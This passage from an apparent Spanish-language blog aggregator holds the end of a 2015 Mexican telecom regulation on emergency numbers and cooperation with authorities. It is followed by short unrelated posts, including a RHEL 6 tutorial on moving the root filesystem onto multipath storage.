CUADRAGÉSIMO CUARTO.- Los Concesionarios y Autorizados deberán contar con Dispositivos o Equipos Terminales Móviles que tengan funcionalidades y programas que permitan la accesibilidad de las personas con discapacidad motriz, visual y auditiva al Número 911 y ponerlos a disposición de dichas personas.

Dicha información deberá ser puesta a disposición del público en general, de forma fácilmente identificable, a través de un aviso mediante el cual se comunique la posibilidad de consultarla en sus centros de atención y de manera detallada a través de medios electrónicos.

CUADRAGÉSIMO QUINTO.- Gratuitamente los Concesionarios y Autorizados deberán dar prioridad a las comunicaciones que realicen sus usuarios, bajo cualquier modalidad, incluyendo SMS, destinadas al Número 911. Por dar prioridad a las comunicaciones se entenderá el establecer e implementar los mecanismos y/o capacidades necesarias para que se proporcione acceso prioritario a los recursos de redes de telecomunicaciones y/o su utilización.

CUADRAGÉSIMO SEXTO.- Los Concesionarios y Autorizados deberán dar prioridad a las comunicaciones originadas desde los Números Geográficos de los centros de atención de llamadas de emergencia hacia los usuarios.

Para estos efectos, el Secretariado Ejecutivo informará a los Concesionarios, a los Autorizados y al Instituto en formato electrónico los Números Geográficos de los centros de atención de llamadas de emergencia, así como sus actualizaciones. El Secretariado Ejecutivo hará del conocimiento del Instituto las medidas implementadas o a implementarse para evitar el mal uso de la prioridad en estas líneas por el personal de los centros de atención de llamadas de emergencias.

CUADRAGÉSIMO SÉPTIMO.- Los Concesionarios y Autorizados darán prioridad a las comunicaciones y mensajes de la autoridad federal, conforme al protocolo de priorización de las autoridades federales de Protección Civil. La Coordinación Nacional de Protección Civil de la Secretaría de Gobernación proporcionará la información necesaria de los Números Geográficos que recibirán esta prioridad.

Los Concesionarios y Autorizados deberán indicar a la Coordinación Nacional de Protección Civil y al Instituto, el Área Responsable a quien se contactará para atender las solicitudes y acciones relacionadas con la priorización de las comunicaciones en Situaciones de Emergencia o Desastre, así como los datos de localización de la misma. Esta área deberá estar disponible las veinticuatro horas del día y los trescientos sesenta y cinco días del año. Al efecto, podrán designar a la misma Área Responsable a la que se refiere el lineamiento SÉPTIMO.

CUADRAGÉSIMO OCTAVO.- Los Concesionarios y Autorizados deberán dar gratuitamente prioridad a las comunicaciones y mensajes en Situaciones de Emergencia o Desastre que emitan las autoridades competentes. Dichas comunicaciones serán destinadas a las áreas o polígonos específicos afectados por la Situación de Emergencia o el Desastre que indiquen las autoridades competentes, sin costo alguno para los usuarios.

CUADRAGÉSIMO NOVENO.- El Instituto coadyuvará con las autoridades competentes, en el establecimiento de un protocolo común para alertar por riesgos o Situaciones de Emergencia en materia de protección civil, el cual incluirá un formato electrónico general para el intercambio de alertas de emergencia y advertencias públicas que puedan ser difundidas simultáneamente en diversas plataformas de telecomunicaciones y radiodifusión, en los términos que éste establezca conforme a la normatividad aplicable de protección civil.

CAPÍTULO X

DE LOS ESTUDIOS E INVESTIGACIONES QUE PERMITAN INHIBIR Y COMBATIR LA UTILIZACIÓN DE EQUIPOS DE TELECOMUNICACIONES PARA LA COMISIÓN DE DELITOS O ACTUALIZACIÓN DE RIESGOS O AMENAZAS A LA SEGURIDAD NACIONAL

QUINCUAGÉSIMO.- Los Concesionarios, Autorizados y las organizaciones a que se refiere el artículo 190, fracción XII, de la LFTR realizarán, bajo la coordinación del Instituto, estudios e investigaciones que tengan por objeto el desarrollo de soluciones tecnológicas que permitan inhibir y combatir la utilización de equipos de telecomunicaciones para la comisión de delitos o actualización de riesgos o amenazas a la seguridad nacional. Para tales efectos, el Instituto coordinará un Comité Especializado integrado por los referidos Concesionarios, Autorizados y organizaciones.

Los resultados que se obtengan se registrarán en un informe anual que se remitirá al Instituto, al Congreso de la Unión y al Ejecutivo Federal.

Los Concesionarios y Autorizados podrán participar de manera directa en el Comité Especializado o, en su caso, a través de la organización a que se refiere el artículo 190, fracción XII de la LFTR.

QUINCUAGÉSIMO PRIMERO.- El Comité Especializado tendrá las siguientes funciones:

I. Establecer anualmente un plan de trabajo, calendario de sesiones y las líneas de investigación a seguir;

II. Proponer los estudios e investigaciones a realizarse;

III. Definir los mecanismos de financiamiento de los estudios y trabajos de investigación;

IV. Crear grupos de trabajo para el mejor desarrollo de sus funciones, y

V. Emitir un informe anual de actividades en el mes de enero de cada año.

Las líneas de investigación deberán representar la problemática nacional y tomar en consideración los instrumentos programáticos del Ejecutivo Federal. Estos estudios podrán ser realizados por los integrantes del Comité Especializado y/o a través de instancias académicas y de investigación y desarrollo nacionales y extranjeras.

QUINCUAGÉSIMO SEGUNDO.- El Comité Especializado estará integrado por los Concesionarios, Autorizados y en su caso, las organizaciones que los Concesionarios que operen redes públicas de telecomunicaciones constituyan voluntariamente en términos de la fracción XII del artículo 190 de la LFTR.

QUINCUAGÉSIMO TERCERO.- Cada Concesionario, Autorizado u organización podrá designar a una persona para representarlo, quien contará con voz y voto en el Comité Especializado.

Para participar en el Comité Especializado, los Concesionarios, Autorizados u organizaciones deberán comunicar por escrito al Presidente del Comité Especializado la autorización respectiva de las personas designadas.

QUINCUAGÉSIMO CUARTO.- El Comité Especializado será coordinado por el Instituto; a su vez, dicho Comité contará con un Presidente, un Secretario Técnico y sus respectivos suplentes, cargos que serán ocupados por servidores públicos del Instituto y serán designados por el Comisionado Presidente del mismo.

QUINCUAGÉSIMO QUINTO.- El Presidente del Comité Especializado tendrá las siguientes funciones:

I. Convocar a las sesiones del Comité Especializado por conducto del Secretario Técnico, dando cuenta del orden del día;

II. Presidir las sesiones del Comité Especializado;

III. Aprobar el plan anual de trabajo y las líneas de investigación propuestas por los integrantes del Comité;

IV. Proponer el orden del día de las sesiones del Comité Especializado;

V. Coordinar la elaboración del informe anual que contenga los resultados de los estudios e investigaciones, el cual se remitirá al Congreso de la Unión y al Ejecutivo Federal;

VI. Proponer al Comité Especializado la integración de grupos de trabajo, y

VII. Emitir voto de calidad en caso de empate.

QUINCUAGÉSIMO SEXTO.- El Secretario Técnico del Comité Especializado tendrá las siguientes funciones:

I. Notificar por los medios acordados, las convocatorias a las sesiones del Comité;

II. Verificar la lista de asistencia y el quórum;

III. Levantar las actas de cada sesión;

IV. Distribuir entre los integrantes del Comité Especializado las actas de cada sesión;

V. Llevar un registro actualizado de los integrantes del Comité Especializado, su información de contacto y demás relativa a la participación de éstos en las actividades del Comité Especializado, y

VI. Llevar un registro y control de actas, acuerdos, resoluciones emitidas por el Comité Especializado y toda la documentación relativa al funcionamiento del mismo.

QUINCUAGÉSIMO SÉPTIMO.- La convocatoria para la celebración de una sesión se notificará vía correo electrónico a los integrantes del Comité Especializado con al menos dos días hábiles de anticipación a la fecha señalada para su celebración.

La convocatoria deberá incluir la fecha, hora de inicio y lugar en que se llevará a cabo la sesión, así como el orden del día.

Para iniciar una sesión válidamente, se requerirá la presencia de por lo menos la mitad más uno de los integrantes del Comité Especializado. Una vez verificado el quórum, el Presidente del Comité Especializado dará inicio a la sesión mediante la lectura y desahogo del orden del día.

Las sesiones se conducirán conforme a lo establecido en el orden del día y cada integrante del Comité Especializado podrá expresar su opinión y proponer medidas y modificaciones a la información y documentos presentados.

Cuando el Presidente del Comité Especializado considere que un tema del orden del día haya sido suficientemente debatido, lo someterá a votación de los asistentes. El Secretario del Comité contará los votos y asentará en el acta el resultado de la votación.

Las decisiones del Comité Especializado se tomarán por mayoría de votos de los asistentes a la sesión.

El cierre del acta de sesión se dará con la lectura de la misma y la firma del Presidente y el Secretario Técnico del Comité Especializado, así como por los integrantes del Comité Especializado que se encuentren presentes.

CAPÍTULO XI

DE LAS SANCIONES

QUINCUAGÉSIMO OCTAVO.- El incumplimiento a los presentes Lineamientos será sancionado en términos de lo dispuesto en la LFTR y las demás aplicables.

QUINCUAGÉSIMO NOVENO.- Queda prohibida la utilización de los datos conservados con motivo de lo dispuesto en el Título Octavo de la LFTR y los presentes Lineamientos para fines distintos a los previstos en ellos; cualquier uso distinto será sancionado por las autoridades competentes en términos de las disposiciones aplicables.

ANEXO I

ANEXO II

INSTRUCCIONES DE LLENADO DE LOS FORMATOS DEL ANEXO II:

[…]

ARTÍCULO SEGUNDO.- Se modifican los numerales 5.4.1 y 5.4.2 y se adiciona el numeral 5.4.3 del Plan Técnico Fundamental de Numeración, publicado en el Diario Oficial de la Federación el 21 de junio de 1996, para quedar como sigue:

[…]

TRANSITORIOS

PRIMERO.- El presente Acuerdo entrará en vigor a los treinta días naturales siguientes a su publicación en el Diario Oficial de la Federación, sin perjuicio de lo dispuesto en los transitorios siguientes.

SEGUNDO.- En tanto entre en vigor el presente Acuerdo, los Concesionarios y los Autorizados deberán continuar colaborando con las instancias de seguridad, procuración y administración de justicia bajo los esquemas, convenios o acuerdos y demás mecanismos de colaboración que actualmente se encuentren operando, procurando que dicha colaboración se realice de manera oportuna y efectiva.

Para tal efecto, los Concesionarios y Autorizados deberán notificar por primera vez a los titulares de las Autoridades Facultadas los datos del Área Responsable establecidos en el lineamiento SÉPTIMO, fracción II, en un plazo de diez días hábiles contados a partir de la publicación del presente Acuerdo.

En dicha notificación deberán indicar también el o los sistemas electrónicos adicionales a los establecidos en el lineamiento CUARTO Transitorio con los que cuentan, mediante los cuales podrán recibir y dar respuesta a los requerimientos digitales gestionados por las Autoridades Designadas.

En caso de que los Concesionarios y Autorizados cuenten con diferentes sistemas electrónicos, las Autoridades Designadas podrán seleccionar el que más convenga a sus necesidades.

TERCERO.- En un plazo máximo de diez días hábiles posteriores a la publicación del presente Acuerdo, los Concesionarios y Autorizados informarán al Instituto y harán disponible en un lugar visible de la página de inicio de su portal de Internet, la cuenta de correo electrónico del Área(s) Responsable(s) referida en los lineamientos SÉPTIMO, fracción II, TRIGÉSIMO y CUADRAGÉSIMO SÉPTIMO. Los Concesionarios y Autorizados informarán a través de su portal de Internet los mecanismos para que las autoridades competentes tengan acceso sin restricciones a dicha información.

Las Autoridades Designadas enviarán a la cuenta de correo electrónico hecha disponible en el portal de Internet de los Concesionarios y Autorizados a que se refiere el párrafo anterior, las cuentas de correo electrónico, los acuerdos de designación y demás información que consideren pertinente a efecto de que éstos sean identificados por dichos Concesionarios y Autorizados para procurar el requerimiento y entrega, efectiva y oportuna, de la información objeto de los presentes Lineamientos.

CUARTO.- Los Concesionarios y Autorizados deberán implementar la Plataforma Electrónica prevista en el lineamiento OCTAVO en un plazo de 24 meses contados a partir de la entrada en vigor del presente Acuerdo.

En tanto no se cuente con la Plataforma Electrónica prevista en el lineamiento OCTAVO de los presentes Lineamientos, los Concesionarios y Autorizados deberán implementar alguno de los siguientes medios:

I. Correo electrónico Cifrado. Una vez recibido el requerimiento de información, los Concesionarios y Autorizados deberán enviar a la Autoridad Designada la respuesta a dicho requerimiento a través de un correo electrónico que contenga los archivos Cifrados y a través de un segundo correo, enviarán la contraseña para que la Autoridad Designada descifre la información de los archivos remitidos.

II. Página electrónica. El Concesionario y Autorizado establecerá dicha página electrónica con control de acceso (nombre de usuario y contraseña), para el requerimiento y entrega de información con las Autoridades Designadas.

Las Autoridades podrán utilizar el “FORMATO PARA LA GESTIÓN DE REQUERIMIENTOS DE INFORMACIÓN EN MATERIA DE SEGURIDAD Y JUSTICIA” a que se refiere el lineamiento CUARTO a efectos de realizar requerimientos de información.

En tanto no se cuente con la Plataforma Electrónica prevista en el lineamiento OCTAVO, en el caso de requerimientos presentados por medios electrónicos, con independencia de la respuesta remitida electrónicamente, los Concesionarios y Autorizados deberán enviar la respuesta formal mediante escrito, dentro de los plazos previstos en la LFTR y estos Lineamientos, cuando así se solicite, a partir de la recepción del oficio de la autoridad, mismo que deberá ser enviado a las oficinas que para el caso señale el requerimiento.

La información de localización geográfica en tiempo real de los equipos de comunicación móvil, el IMEI y el IMSI del Dispositivo o Equipo Terminal Móvil objeto del requerimiento, será enviada inmediatamente sin exceder el plazo de una hora, después de haberse cerciorado que cumple con lo dispuesto en la fracción IV del lineamiento SÉPTIMO.

QUINTO.- Dentro de los veinte días hábiles contados a partir de la publicación del presente Acuerdo en el Diario Oficial de la Federación, el Instituto establecerá y coordinará los Grupos de Trabajo referidos en el lineamiento DÉCIMO QUINTO así como el Comité Especializado a que se refiere el lineamiento QUINCUAGÉSIMO y designará a los servidores públicos que participarán en ellos.

SEXTO.- Los titulares de las Autoridades Facultadas podrán establecer, conforme a las disposiciones aplicables, por sí mismas o por conducto de Conferencias, los convenios, acuerdos y demás resoluciones encaminadas a facilitar la observancia de los presentes Lineamientos, el establecimiento del Portal de Información y los demás que resulten necesarios para el cumplimiento de sus atribuciones en la materia.

SÉPTIMO.- Los informes mencionados en el lineamiento DÉCIMO OCTAVO, fracciones I y II, deberán ser entregados al Instituto por los Concesionarios y Autorizados por primera vez en julio de 2016. El informe previsto en la fracción III de dicho lineamiento, deberá entregarse por primera vez en febrero de 2016 y deberá incluir la precisión con la que entregarán la información a partir de la entrada en vigor del presente Acuerdo para cada tecnología y zona, es decir: GPS o triangulación para Localidad Rural, Suburbana y Urbana, mediante el formato y medio electrónico que el Instituto defina para tales efectos. En caso de que el formato y medio electrónico no haya sido definido, los informes deberán ser presentados de manera impresa en el domicilio del Instituto.

Los informes subsecuentes deberán ser entregados al Instituto de manera electrónica en los plazos establecidos.

OCTAVO.- En un plazo no mayor a dieciocho meses contados a partir de la publicación del presente Acuerdo, los Concesionarios y, en su caso, los Autorizados, deberán cumplir con los parámetros de precisión establecidos en el lineamiento CUADRAGÉSIMO. Durante el primer año contado a partir de dichos dieciocho meses, estos parámetros deberán observarse en al menos el 60% de su red, el 70% en el segundo año, y así sucesivamente, incrementando en 10% su cumplimiento, año con año hasta llegar al 90% de la totalidad de su red. Los Concesionarios y Autorizados remitirán al Instituto en el mes de enero de cada año un informe del cumplimiento del presente transitorio.

La metodología para evaluar el cumplimiento de los parámetros de precisión relativos a la localización geográfica en tiempo real de llamadas de emergencia será publicada por el Instituto dentro de un plazo de ciento veinte días hábiles contados a partir de la entrada en vigor del presente Acuerdo.

NOVENO.- Para efectos de las autoridades de procuración de justicia referidas en la fracción I del artículo 190 de la LFTR, continuarán vigentes las disposiciones de la Ley Federal de Telecomunicaciones en materia de localización geográfica en tiempo real hasta en tanto entre en vigor el Código Nacional de Procedimientos Penales, en términos de lo dispuesto en el artículo TRIGÉSIMO SÉPTIMO transitorio del Decreto por el que se expiden la Ley Federal de Telecomunicaciones y Radiodifusión, y la Ley del Sistema Público de Radiodifusión del Estado Mexicano; y se reforman, adicionan y derogan diversas disposiciones en materia de telecomunicaciones y radiodifusión, publicado en el Diario Oficial de la Federación el 14 de julio de 2014.

DÉCIMO.- Los Concesionarios y Autorizados contarán con veinte días hábiles contados a partir de la entrada en vigor del presente Acuerdo para implementar las medidas previstas en el Capítulo VII de los presentes Lineamientos.

DÉCIMO PRIMERO.- El Instituto, a más tardar en un plazo de treinta días hábiles contados a partir de la publicación del presente Acuerdo, convocará al Comité Técnico de Portabilidad para que coadyuve atendiendo a lo establecido en el CAPÍTULO IX de los presentes Lineamientos, así como lleve a cabo las acciones necesarias, en el ámbito de sus funciones, a efecto de lograr la eficiente implementación y operación del Número 911.

DÉCIMO SEGUNDO.- Para efectos de lo dispuesto en el lineamiento TRIGÉSIMO CUARTO y TRIGÉSIMO SEXTO de los presentes Lineamientos, la migración e integración de los códigos 060 (Policía Local), 061 (Policía Judicial Estatal y del D.F.), 065 (Cruz Roja), 068 (Bomberos), 066 (Sistema Nacional de Atención de Emergencias de la Ciudadanía) y 080 (Seguridad y Emergencia) hacia el Número 911, así como la convivencia del código de servicios especiales 066 y el Número 911 se llevarán a cabo en los plazos que el Secretariado Ejecutivo defina para tales efectos.

DÉCIMO TERCERO.- Para efectos de dar cumplimiento a lo dispuesto en los lineamientos CUADRAGÉSIMO QUINTO y CUADRAGÉSIMO SEXTO, los Concesionarios y Autorizados contarán con un plazo de cuarenta y cinco días hábiles, contados a partir del día siguiente a aquel en el que el Secretariado Ejecutivo les informe la implementación del Número 911 en cierta área o población, para realizar los ajustes necesarios a sus redes con el propósito de dar prioridad a las comunicaciones y mensajes destinados al Número 911 a nivel nacional, así como a las comunicaciones originadas desde los centros de atención de llamadas de emergencia, y comunicarlo dentro del mismo plazo al Instituto, anexando la documentación e información que acredite el cumplimiento de la obligación.

Para efectos del lineamiento TRIGÉSIMO OCTAVO y el segundo párrafo del lineamiento CUADRAGÉSIMO SEXTO de los presentes Lineamientos, el Secretariado Ejecutivo del Sistema Nacional de Seguridad Pública, entregará dicha información a los Concesionarios, Autorizados y al Instituto a más tardar a los cuarenta y cinco días hábiles a partir de la publicación del presente Acuerdo.

DÉCIMO CUARTO.- Para efectos del lineamiento CUADRAGÉSIMO OCTAVO, el Instituto coordinará las mesas de trabajo correspondientes entre las autoridades competentes y los Concesionarios y Autorizados. Dentro de los veinte días hábiles contados a partir de la publicación del presente Acuerdo en el Diario Oficial de la Federación, el Instituto convocará a dichas mesas.

DÉCIMO QUINTO.- Las autorizaciones emitidas en su momento por la extinta Comisión Federal de Telecomunicaciones y por el Instituto a las entidades gubernamentales y de servicio social para utilizar los códigos de servicios especiales para seguridad y emergencia 060 (Policía Local), 061 (Policía Judicial Estatal y del D.F.), 065 (Cruz Roja), 066 (Sistema Nacional de Atención de Emergencias de la Ciudadanía), 068 (Bomberos) y 080 (Seguridad y Emergencia), contarán con el plazo que defina el Secretariado Ejecutivo, previamente acordado con el Instituto, para migrar hacia el Número 911; transcurrido dicho plazo, se realice o no la migración, se dejarán sin efectos. Al respecto, el Instituto notificará por escrito a cada una de las entidades gubernamentales y de servicio social que actualmente cuenten con alguna autorización de uso de código de servicios especiales para llamadas de emergencia o seguridad distintas al Número 911 y 089 el término de la vigencia.

DÉCIMO SEXTO.- Los Concesionarios y Autorizados deberán ofrecer en forma gratuita e irrestricta el acceso a servicios de seguridad y emergencia a través de los códigos de servicios especiales 060 (Policía Local), 061 (Policía Judicial Estatal y del D.F.), 065 (Cruz Roja), 066 (Sistema Nacional de Atención de Emergencias de la Ciudadanía), 068 (Bomberos) y 080 (Seguridad y Emergencia) en tanto no concluya su migración hacia el Número 911 y/o durante el periodo de convivencia del código de servicios especiales 066 y el Número 911. Lo anterior implicará que para efectos de originación, terminación o tránsito de llamadas, dichas comunicaciones tampoco deberán generar cargos de interconexión.

DÉCIMO SÉPTIMO.- Con el fin de evitar confusiones a los usuarios finales, los Concesionarios y Autorizados dejarán de utilizar dentro de sus redes cualquier marcación alterna al Número 911 y, en su caso, a los códigos de servicios especiales, una vez que el Secretariado Ejecutivo determine la conclusión de la implementación y convivencia del Número 911.

En su caso, los Concesionarios y Autorizados que cuenten con usuarios cuya numeración inicie con el 911 deberán sustituir dicha numeración, conforme a los plazos de implementación que indique el Secretariado Ejecutivo. Para tal efecto, los Concesionarios y Autorizados deberán notificar a sus usuarios, al menos, cuarenta días hábiles previos a la fecha en que vayan a realizar el cambio del número, a fin de que éstos puedan tomar las acciones pertinentes. En todo momento deberá garantizarse la continuidad de sus servicios.

Asimismo, los Concesionarios y Autorizados contarán con diez días hábiles posteriores a la sustitución mencionada en el párrafo anterior, para reintegrar a la reserva de números del Instituto las series numéricas que inicien con 911, mediante escrito firmado por su representante legal.

DÉCIMO OCTAVO.- Para efectos de lo dispuesto en el lineamiento CUADRAGÉSIMO CUARTO de los presentes Lineamientos, los Concesionarios y Autorizados deberán contar con Dispositivos o Equipos Terminales Móviles que tengan funcionalidades y/o programas que permitan la accesibilidad de las personas con discapacidad motriz, visual y auditiva al Número 911, en un plazo máximo de cuarenta y cinco días hábiles contados a partir de la entrada en vigor del presente Acuerdo.

DÉCIMO NOVENO.- Para efectos de lo dispuesto en el lineamiento CUADRAGÉSIMO NOVENO, el Instituto coadyuvará con las autoridades competentes para iniciar los trabajos sobre el protocolo relativo al sistema de alertamiento; para ello, en un plazo máximo de veinte días hábiles, contados a partir de la entrada en vigor del presente Acuerdo el Instituto convocará a reuniones de trabajo a las autoridades competentes.

Lunes 30 de noviembre de 2015

Marco Alfonso Ocampo

Marco Alfonso Ocampo
Pub – Marco Alfonso

Filosofía Shaker

Shaker Philosophy aplicado al Software Development

If it is not useful or necessary, free yourself from imagining that you need to make it.
If it is useful and necessary, free yourself from imagining that you need to enhance it by adding what is not an integral part of its usefulness or necessity.
And finally: If it is both useful and necessary and you can recognize and eliminate what is not essential, then go ahead and make it as beautifully as you can.

ó mas consiso:

Don’t make something unless it is both made necessary and useful; but if it is both necessary and useful, don’t hesitate to make it beautiful

 

Domingo 29 de noviembre de 2015

Juguetes nuevos para los juguetes

La semana pasada llegaron las memorias, alrededor de 80 dimms, para crecer la granja de virtualización y para las Base de Datos de los ambientes de desarrollo y calidad, cada uno de los nodos de vSphere tendrá 512GB de RAM, esto se va poner interesante por que vamos a migrar todo lo de Oracle VM, que son todas las maquinas de desarrollo y calidad, algo así como 1.5TB de RAM asignados. El primer problema que veo de esta migración es que las maquinas son tipo PVM o paravirtualizadas, con algún fork de XEN que es lo que utiliza Oracle VM, para poderlas migrar es necesario que sean HVM Hardware Virual Machine, tengo algunas ideas pero aun no he realizado ninguna prueba, la opción mas fácil es crear nuevas maquinas y solo pasar la partición de la aplicación. Por lo pronto les dejo una foto de todos los juguetes que llegaron, me sentí como niño con juego nuevo y luego doblemente feliz al llegar con ‘season pass’.

 

Sábado 28 de noviembre de 2015

Héctor Daniel Cortés

Héctor Daniel Cortés
'Aztec Eagle' Turbo

Rumbo a Casa

Tiempo estimado de llegada: 9:00

Martes 24 de noviembre de 2015

Alex Callejas

Alex Callejas
|rootzilopochtli.com|

How to: Mover / (raíz) de un dispositivo simple a multipath

ezekiel_25_17_

“El camino del hombre recto esta por todos lados
rodeado por las injusticias de los egoístas
y la tiranía de los hombres malos.
Bendito sea aquel pastor que en nombre de la caridad
y de la buena voluntad saque a los débiles del Valle de la Oscuridad
por que es el autentico guardián de su hermano
y el descubridor de los niños perdidos.
Y os aseguro que vendré a castigar con gran venganza
y furiosa cólera a aquellos que pretendan envenenar y destruir a mis hermanos,
y tu sabrás que mi nombre es Yahvé cuando caiga mi venganza sobre ti”
Ezequiel 25,17

Uno de los aspectos que se buscan en una solución computacional, es que los datos estén siempre disponibles y sean confiables. Bajo este concepto, una de las principales preocupaciones como SysAdmin, es mantener el sistema operativo en buenas condiciones, seguro y con la mejor optimización de recursos posible. Para asegurar la disponibilidad y funcionalidad del sistema operativo existen diversos métodos, uno de los más recurridos es utilizar discos con más de una vía de acceso (ej: un disco accesado mediante dos canales diferentes de fibra óptica), esta técnica con tolerancia a fallos y mejora del rendimiento es conocida comúnmente como multipathing:

diagram

Esta técnica provee al disco, al menos, de dos accesos diferentes: path1path2. Cuando uno de los canales no esta disponible, el disco se puede acceder por el otro canal, sin perder funcionalidad.

Por lo general, cuando un equipo es entregado, debería seguir las recomendaciones mínimas de instalación y administración (o eso quisiéramos :( ); y en caso, contrario, nuestra primer labor es llevarlo al punto donde la administración sea estándar con nuestros demás equipos.

Bajo este concepto, y siempre siguiendo Las Tres Leyes del SysAdmin, imaginemos que nos entregan un server de reciente asignación y observamos que el sistema operativo se encuentra en volúmenes lógicos, pero únicamente sobre un volumen físico:

[root@server ~]# df -h
Filesystem                      Size Used Avail Use% Mounted on
/dev/sda1                       500M 153M 295M  35%  /boot
/dev/mapper/vg_root-lv_root      10G 5.5G 4.5G  62%  /
/dev/mapper/vg_root-lv_home      10G 533M 9.4G   6%  /home
/dev/mapper/vg_root-lv_opt       10G 843M 9.1G   9%  /opt
/dev/mapper/vg_root-lv_tmp       10G 871M 9.1G  10%  /tmp
/dev/mapper/vg_root-lv_usr       10G 995M 9G    11%  /usr
/dev/mapper/vg_root-lv_usrlocal  10G 115M 9.8G   2%  /usr/local
/dev/mapper/vg_root-lv_var       10G 3.7G 6.3G  41%  /var
[root@server ~]# 
[root@server ~]# vgs
 Found duplicate PV eeuXgciHmayKUcMWfydf1KYLXBCph7Yo: using /dev/sda2 not /dev/sdc2
 Found duplicate PV eeuXgciHmayKUcMWfydf1KYLXBCph7Yo: using /dev/sdd2 not /dev/sda2
 Found duplicate PV eeuXgciHmayKUcMWfydf1KYLXBCph7Yo: using /dev/sdc2 not /dev/sdb2
 VG      #PV #LV #SN Attr   VSize   VFree
 vg_root   1   7   0 wz--n- 263.28g 97.28g 
[root@server ~]# 
[root@server ~]# pvs
 Found duplicate PV eeuXgciHmayKUcMWfydf1KYLXBCph7Yo: using /dev/sda2 not /dev/sdc2
 Found duplicate PV eeuXgciHmayKUcMWfydf1KYLXBCph7Yo: using /dev/sdd2 not /dev/sda2
 Found duplicate PV eeuXgciHmayKUcMWfydf1KYLXBCph7Yo: using /dev/sdc2 not /dev/sdb2
 PV        VG      Fmt  Attr PSize   PFree
 /dev/sda2 vg_root lvm2 a--  263.28g 97.28g 
[root@server ~]#

El cual, al examinar los discos, se observa que los dispositivos mencionados como duplicados son del mismo tamaño, mismos sectores y mismas particiones:

[root@server ~]# fdisk -l | grep GB | grep 322.1
Disk /dev/sda: 322.1 GB, 322122547200 bytes
Disk /dev/sdb: 322.1 GB, 322122547200 bytes
Disk /dev/sdc: 322.1 GB, 322122547200 bytes
Disk /dev/sde: 322.1 GB, 322122547200 bytes
[root@server ~]# fdisk -l | grep "*" | grep -v sectors
/dev/sda1 * 2048 1026047 1024000 500M 83 Linux
/dev/sdb1 * 2048 1026047 1024000 500M 83 Linux
/dev/sdc1 * 2048 1026047 1024000 500M 83 Linux
/dev/sdd1 * 2048 1026047 1024000 500M 83 Linux
[root@server ~]#

Esto quiere decir que el mismo disco es accesado por 4 canales (paths) diferentes.

Entonces, para tenerlo con multipathing, primeramente instalamos y activamos el paquete:

[root@server ~]# yum install -y device-mapper-multipath
...
Installed:
 device-mapper-multipath.x86_64 0:0.4.9-87.el6 

Dependency Installed:
 device-mapper-multipath-libs.x86_64 0:0.4.9-87.el6 libaio.x86_64 0:0.3.107-10.el6 

Complete!
[root@server ~]# mpathconf --enable
[root@server ~]# chkconfig multipathd on
[root@server ~]# chkconfig multipathd --list
multipathd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
[root@server ~]# service multipathd start
Starting multipathd daemon: [ OK ]
[root@server ~]# service multipathd status
multipathd (pid 1573) is running...
[root@server ~]#

Es necesario editar el archivo /etc/multipath.conf, agregando una excepción a la blacklist de multipath. Para esto debemos ubicar el WWID de nuestro disco, utilizando el comando vgscan -vvv:

[root@server ~]# vgscan -vvv | grep sda2 | grep by-id
 /dev/sda2: Aliased to /dev/disk/by-id/scsi-380000970000198701457533030364320-part2 in device cache (preferred name)
[root@server ~]#

Este WWID lo agregamos en el/etc/multipath.conf:

[root@server ~]# egrep -v '^#|^$' /etc/multipath.conf
defaults {
 find_multipaths yes
 user_friendly_names yes
 failback immediate
}
blacklist_exceptions {
 wwid 380000970000198701457533030364320
}
[root@server ~]#

Debido a que nuestro filesystem raíz (/) esta alojado en un volumen lógico, es necesario también, agregar un filtro a los nombres de los dispositivos de multipath en el archivo de configuración de los volúmenes lógicos (/etc/lvm/lvm.conf):

[root@server ~]vi /etc/lvm/lvm.conf
...
filter = [ "a|/dev/mapper/mpath.*|", "r|.*|" ]
...
preferred_names = [ "^/dev/mpath/", "^/dev/mapper/mpath" ]
...
[root@server ~]#

Por cuestión de seguridad, para que no lea la configuración anterior de los volúmenes lógicos, eliminamos la caché de lvm:

[root@server ~]# rm -rf /etc/lvm/cache/.cache

Con estos cambios, es necesario reconstruir el initramfs, el filesystem virtual que ayuda al sistema a cargar y montar el fs raíz (/), para lo cual utilizamos la herramienta dracut, indicándole que queremos utilizar un disco con multipath y un volumen lógico:

[root@server ~]# dracut --force --add "multipath lvm" --include /etc/multipath /etc/multipath --lvmconf -v

Cuando ha terminado de reconstruir el initramfs, tenemos que reiniciar el equipo para verificar que el filesystem raíz (/) esta ahora bajo el control de multipath:

[root@server ~]# multipath -ll
mpatha (380000970000198701457533030364320) dm-0 EMC,SYMMETRIX
size=300G features='1 queue_if_no_path' hwhandler='0' wp=rw
`-+- policy='round-robin 0' prio=1 status=active
 |- 1:0:0:0 sda 8:0 active ready running
 |- 3:0:0:0 sdc 8:96 active ready running
 |- 2:0:0:0 sdb 8:48 active ready running
 `- 4:0:0:0 sdd 8:144 active ready running
[root@server ~]# lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 300G 0 disk
└─mpatha (dm-0) 253:2 0 300G 0 mpath
 ├─mpathap1 (dm-2) 253:3 0 10M 0 part
 ├─mpathap2 (dm-3) 253:4 0 1G 0 part /boot
 └─mpathap3 (dm-4) 253:5 0 263.3G 0 part
 ├─vg_root-lv_opt (dm-7) 253:8 0 10G 0 lvm /opt
 ├─vg_root-lv_var (dm-8) 253:9 0 10G 0 lvm /var
 ├─vg_root-lv_home (dm-9) 253:10 0 10G 0 lvm /home
 ├─vg_root-lv_usrlocal (dm-10) 253:11 0 10G 0 lvm /usr/local
 ├─vg_root-lv_root (dm-5) 253:6 0 10G 0 lvm /
 ├─vg_root-lv_swap (dm-6) 253:7 0 16G 0 lvm [SWAP]
 ├─vg_root-lv_tmp (dm-11) 253:12 0 10G 0 lvm /tmp
 └─vg_root-lv_usr (dm-12) 253:13 0 10G 0 lvm /usr
sdb 8:48 0 300G 0 disk
└─mpatha (dm-0) 253:2 0 300G 0 mpath
 ├─mpathap1 (dm-2) 253:3 0 10M 0 part
 ├─mpathap2 (dm-3) 253:4 0 1G 0 part /boot
 └─mpathap3 (dm-4) 253:5 0 263.3G 0 part
 ├─vg_root-lv_opt (dm-7) 253:8 0 10G 0 lvm /opt
 ├─vg_root-lv_var (dm-8) 253:9 0 10G 0 lvm /var
 ├─vg_root-lv_home (dm-9) 253:10 0 10G 0 lvm /home
 ├─vg_root-lv_usrlocal (dm-10) 253:11 0 10G 0 lvm /usr/local
 ├─vg_root-lv_root (dm-5) 253:6 0 10G 0 lvm /
